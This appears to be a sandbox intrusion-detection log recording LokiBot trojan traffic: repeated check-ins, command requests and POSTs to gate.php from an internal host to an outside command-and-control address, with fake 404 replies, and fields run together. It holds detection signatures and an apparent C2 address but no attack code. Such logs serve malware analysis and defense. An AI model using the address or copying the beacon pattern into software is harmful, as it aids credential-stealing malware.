                                    12/03/20-10:02:41.476969TCP2025483ET TROJAN LokiBot Fake 404 Response804974447.91.79.163192.168.2.3
                                    12/03/20-10:02:41.727267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.727267TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974780192.168.2.347.91.79.163
                                    12/03/20-10:02:41.777842TCP2025483ET TROJAN LokiBot Fake 404 Response804974747.91.79.163192.168.2.3
                                    12/03/20-10:02:42.032912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.032912TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974880192.168.2.347.91.79.163
                                    12/03/20-10:02:42.092413TCP2025483ET TROJAN LokiBot Fake 404 Response804974847.91.79.163192.168.2.3
                                    12/03/20-10:02:42.331415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.331415TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4974980192.168.2.347.91.79.163
                                    12/03/20-10:02:42.389556TCP2025483ET TROJAN LokiBot Fake 404 Response804974947.91.79.163192.168.2.3
                                    12/03/20-10:02:42.653877TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.653877TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975080192.168.2.347.91.79.163
                                    12/03/20-10:02:42.717299TCP2025483ET TROJAN LokiBot Fake 404 Response804975047.91.79.163192.168.2.3
                                    12/03/20-10:02:42.984814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.347.91.79.163
                                    12/03/20-10:02:42.984814TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975180192.168.2.347.91.79.163
                                    12/03/20-10:02:43.050733TCP2025483ET TROJAN LokiBot Fake 404 Response804975147.91.79.163192.168.2.3
                                    12/03/20-10:02:43.283331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.283331TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975280192.168.2.347.91.79.163
                                    12/03/20-10:02:43.342667TCP2025483ET TROJAN LokiBot Fake 404 Response804975247.91.79.163192.168.2.3
                                    12/03/20-10:02:43.612446TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.612446TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975580192.168.2.347.91.79.163
                                    12/03/20-10:02:43.673909TCP2025483ET TROJAN LokiBot Fake 404 Response804975547.91.79.163192.168.2.3
                                    12/03/20-10:02:43.931445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.931445TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975680192.168.2.347.91.79.163
                                    12/03/20-10:02:43.995368TCP2025483ET TROJAN LokiBot Fake 404 Response804975647.91.79.163192.168.2.3
                                    12/03/20-10:02:44.249687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.249687TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975880192.168.2.347.91.79.163
                                    12/03/20-10:02:44.316339TCP2025483ET TROJAN LokiBot Fake 404 Response804975847.91.79.163192.168.2.3
                                    12/03/20-10:02:44.661642TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.661642TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4975980192.168.2.347.91.79.163
                                    12/03/20-10:02:44.797400TCP2025483ET TROJAN LokiBot Fake 404 Response804975947.91.79.163192.168.2.3
                                    12/03/20-10:02:45.021438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.021438TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976080192.168.2.347.91.79.163
                                    12/03/20-10:02:45.078031TCP2025483ET TROJAN LokiBot Fake 404 Response804976047.91.79.163192.168.2.3
                                    12/03/20-10:02:45.361002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.361002TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976180192.168.2.347.91.79.163
                                    12/03/20-10:02:45.419547TCP2025483ET TROJAN LokiBot Fake 404 Response804976147.91.79.163192.168.2.3
                                    12/03/20-10:02:45.691222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.691222TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976280192.168.2.347.91.79.163
                                    12/03/20-10:02:45.752643TCP2025483ET TROJAN LokiBot Fake 404 Response804976247.91.79.163192.168.2.3
                                    12/03/20-10:02:46.008231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.008231TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976380192.168.2.347.91.79.163
                                    12/03/20-10:02:46.068412TCP2025483ET TROJAN LokiBot Fake 404 Response804976347.91.79.163192.168.2.3
                                    12/03/20-10:02:46.321986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.321986TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976480192.168.2.347.91.79.163
                                    12/03/20-10:02:46.384203TCP2025483ET TROJAN LokiBot Fake 404 Response804976447.91.79.163192.168.2.3
                                    12/03/20-10:02:46.623971TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.623971TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976580192.168.2.347.91.79.163
                                    12/03/20-10:02:46.686219TCP2025483ET TROJAN LokiBot Fake 404 Response804976547.91.79.163192.168.2.3
                                    12/03/20-10:02:46.941907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.347.91.79.163
                                    12/03/20-10:02:46.941907TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976680192.168.2.347.91.79.163
                                    12/03/20-10:02:47.002928TCP2025483ET TROJAN LokiBot Fake 404 Response804976647.91.79.163192.168.2.3
                                    12/03/20-10:02:47.207696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.207696TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976780192.168.2.347.91.79.163
                                    12/03/20-10:02:47.267355TCP2025483ET TROJAN LokiBot Fake 404 Response804976747.91.79.163192.168.2.3
                                    12/03/20-10:02:47.508868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.508868TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976880192.168.2.347.91.79.163
                                    12/03/20-10:02:47.583864TCP2025483ET TROJAN LokiBot Fake 404 Response804976847.91.79.163192.168.2.3
                                    12/03/20-10:02:47.814806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.814806TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4976980192.168.2.347.91.79.163
                                    12/03/20-10:02:47.873611TCP2025483ET TROJAN LokiBot Fake 404 Response804976947.91.79.163192.168.2.3
                                    12/03/20-10:02:48.133006TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.133006TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977080192.168.2.347.91.79.163
                                    12/03/20-10:02:48.194022TCP2025483ET TROJAN LokiBot Fake 404 Response804977047.91.79.163192.168.2.3
                                    12/03/20-10:02:48.431387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.431387TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977180192.168.2.347.91.79.163
                                    12/03/20-10:02:48.492338TCP2025483ET TROJAN LokiBot Fake 404 Response804977147.91.79.163192.168.2.3
                                    12/03/20-10:02:48.713865TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.713865TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977280192.168.2.347.91.79.163
                                    12/03/20-10:02:48.774088TCP2025483ET TROJAN LokiBot Fake 404 Response804977247.91.79.163192.168.2.3
                                    12/03/20-10:02:49.003810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.003810TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977380192.168.2.347.91.79.163
                                    12/03/20-10:02:49.067828TCP2025483ET TROJAN LokiBot Fake 404 Response804977347.91.79.163192.168.2.3
                                    12/03/20-10:02:49.292978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.292978TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977480192.168.2.347.91.79.163
                                    12/03/20-10:02:49.354669TCP2025483ET TROJAN LokiBot Fake 404 Response804977447.91.79.163192.168.2.3
                                    12/03/20-10:02:49.591345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.591345TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977580192.168.2.347.91.79.163
                                    12/03/20-10:02:49.830853TCP2025483ET TROJAN LokiBot Fake 404 Response804977547.91.79.163192.168.2.3
                                    12/03/20-10:02:50.060344TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.060344TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977680192.168.2.347.91.79.163
                                    12/03/20-10:02:50.125688TCP2025483ET TROJAN LokiBot Fake 404 Response804977647.91.79.163192.168.2.3
                                    12/03/20-10:02:50.360535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.360535TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977780192.168.2.347.91.79.163
                                    12/03/20-10:02:50.424430TCP2025483ET TROJAN LokiBot Fake 404 Response804977747.91.79.163192.168.2.3
                                    12/03/20-10:02:50.664605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.664605TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977880192.168.2.347.91.79.163
                                    12/03/20-10:02:50.723849TCP2025483ET TROJAN LokiBot Fake 404 Response804977847.91.79.163192.168.2.3
                                    12/03/20-10:02:50.972122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.347.91.79.163
                                    12/03/20-10:02:50.972122TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4977980192.168.2.347.91.79.163
                                    12/03/20-10:02:51.037888TCP2025483ET TROJAN LokiBot Fake 404 Response804977947.91.79.163192.168.2.3
                                    12/03/20-10:02:51.261332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.261332TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978080192.168.2.347.91.79.163
                                    12/03/20-10:02:51.322457TCP2025483ET TROJAN LokiBot Fake 404 Response804978047.91.79.163192.168.2.3
                                    12/03/20-10:02:51.534736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.534736TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978180192.168.2.347.91.79.163
                                    12/03/20-10:02:51.601373TCP2025483ET TROJAN LokiBot Fake 404 Response804978147.91.79.163192.168.2.3
                                    12/03/20-10:02:51.849830TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.849830TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978280192.168.2.347.91.79.163
                                    12/03/20-10:02:51.905245TCP2025483ET TROJAN LokiBot Fake 404 Response804978247.91.79.163192.168.2.3
                                    12/03/20-10:02:52.137412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.137412TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978380192.168.2.347.91.79.163
                                    12/03/20-10:02:52.196885TCP2025483ET TROJAN LokiBot Fake 404 Response804978347.91.79.163192.168.2.3
                                    12/03/20-10:02:52.444506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.444506TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978480192.168.2.347.91.79.163
                                    12/03/20-10:02:52.504974TCP2025483ET TROJAN LokiBot Fake 404 Response804978447.91.79.163192.168.2.3
                                    12/03/20-10:02:52.774911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.774911TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978580192.168.2.347.91.79.163
                                    12/03/20-10:02:52.833588TCP2025483ET TROJAN LokiBot Fake 404 Response804978547.91.79.163192.168.2.3
                                    12/03/20-10:02:53.118414TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.118414TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978680192.168.2.347.91.79.163
                                    12/03/20-10:02:53.234137TCP2025483ET TROJAN LokiBot Fake 404 Response804978647.91.79.163192.168.2.3
                                    12/03/20-10:02:53.460522TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.460522TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978880192.168.2.347.91.79.163
                                    12/03/20-10:02:53.519107TCP2025483ET TROJAN LokiBot Fake 404 Response804978847.91.79.163192.168.2.3
                                    12/03/20-10:02:53.749878TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.749878TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4978980192.168.2.347.91.79.163
                                    12/03/20-10:02:53.808731TCP2025483ET TROJAN LokiBot Fake 404 Response804978947.91.79.163192.168.2.3
                                    12/03/20-10:02:54.121373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.347.91.79.163
                                    12/03/20-10:02:54.121373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.347.91.79.163
